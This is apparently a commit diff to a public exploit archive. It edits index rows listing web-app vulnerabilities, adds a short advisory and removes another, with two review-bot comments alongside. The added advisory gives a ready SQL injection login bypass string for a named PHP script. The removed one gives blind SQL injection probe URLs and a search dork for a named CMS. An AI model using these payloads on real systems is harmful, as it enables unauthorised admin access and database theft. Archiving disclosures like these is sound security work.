9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,php,webapps,0
40383,platforms/asp/webapps/40383.txt,"Cisco EPC 3925 - Multiple Vulnerabilities",2016-09-15,"Patryk Bogdan",asp,webapps,80
9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps,0
@ -22107,7 +22107,7 @@ id,file,description,date,author,platform,type,port
10790,platforms/php/webapps/10790.txt,"Joomla! Component com_kkcontent - Blind SQL Injection",2009-12-29,Pyske,php,webapps,0
10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80
10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - (admin) Local File Inclusion",2009-12-30,cr4wl3r,php,webapps,0
10794,platforms/asp/webapps/10794.txt,"WEB Calendar - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0
10794,platforms/asp/webapps/10794.txt,"Web Calendar - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0
10795,platforms/asp/webapps/10795.txt,"ezguestbook - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0
10796,platforms/asp/webapps/10796.txt,"ezscheduler - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0
10798,platforms/php/webapps/10798.txt,"iDevAffiliate 4.0 - Backup",2009-12-30,indoushka,php,webapps,0
@ -26563,7 +26563,7 @@ id,file,description,date,author,platform,type,port
23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showproduct.php' SQL Injection",2004-02-04,G00db0y,php,webapps,0
23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection",2004-02-04,G00db0y,php,webapps,0
23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps,0
23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0
23653,platforms/php/webapps/23653.txt,"Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0
23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - Itemid Parameter Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0
23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing",2004-02-06,"Tri Huynh",cgi,webapps,0
23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 'News' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps,0
@ -28772,7 +28772,7 @@ id,file,description,date,author,platform,type,port
27079,platforms/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 - ForgotPassword.asp Cross-Site Scripting",2006-01-13,"M.Neset KABAKLI",asp,webapps,0
27080,platforms/php/webapps/27080.txt,"EZDatabaseRemote 2.0 - PHP Script Code Execution",2006-01-14,r0t3d3Vil,php,webapps,0
27081,platforms/cgi/webapps/27081.txt,"Ultimate Auction 3.67 - Item.pl Cross-Site Scripting",2006-01-14,querkopf,cgi,webapps,0
27083,platforms/asp/webapps/27083.txt,"8Pixel.net SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps,0
27083,platforms/asp/webapps/27083.txt,"SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps,0
27084,platforms/php/webapps/27084.txt,"Bit 5 Blog 8.1 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0
27085,platforms/php/webapps/27085.txt,"Bit 5 Blog 8.1 - addcomment.php HTML Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0
27086,platforms/php/webapps/27086.txt,"White Album 2.5 - Pictures.php SQL Injection",2006-01-16,liz0,php,webapps,0

platforms/php/webapps/40987.txt Executable file

@ -0,0 +1,12 @@
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Admin login bypass via SQLi
[x] Vendor: http://software.friendsinwar.com/
[x] Script Name: My Click Counter
[x] Script Version: 1.0
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=15
[x] Author: AnarchyAngel AKA Adam
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Navigate to scripts admin login page and submit ' or ''=' for username and password
it should give you access to the admin area. Enjoy >:)
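Review bot: the file header shows this plain-text advisory is added as an executable file; a .txt entry has no reason to carry the execute bit, so add it as a regular file. The body also names neither the login script nor the affected form fields, which is what someone maintaining this application would need in order to find the query and move it to a parameterised statement.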


@ -1,32 +0,0 @@
submitted: 09/01/2008 10:01 AM
-----------------------------------------------------------------------------------
Scr!pt : WebStudio CMS
V3rs!0n : >!<
S!t3 : http://www.bdigital.biz/?pageid=214
Dork : Powered by WebStudio
Auth0r : BorN To K!LL
-----------------------------------------------------------------------------------
Exploit :
/index.php?pageid=[Blind SQL]
Compression :
index.php?pageid=1 and 1=1 <<<<< True
index.php?pageid=1 and 1=2 <<<<< False
-----------------------------------------------------------------------------------
Greets :
str0ke , Dr.2 , General C , CcTero0liTi , GolD_M , n all my friends ..
-----------------------------------------------------------------------------------
# milw0rm.com [2008-11-26]
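Review bot: this file is removed without a stated reason; the commit message lists its old title, "WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)", with no replacement title. The body describes the same index.php pageid parameter as the retained 7216 row, so if it is being dropped as a duplicate, say so in the commit message and name 7216 as the surviving entry.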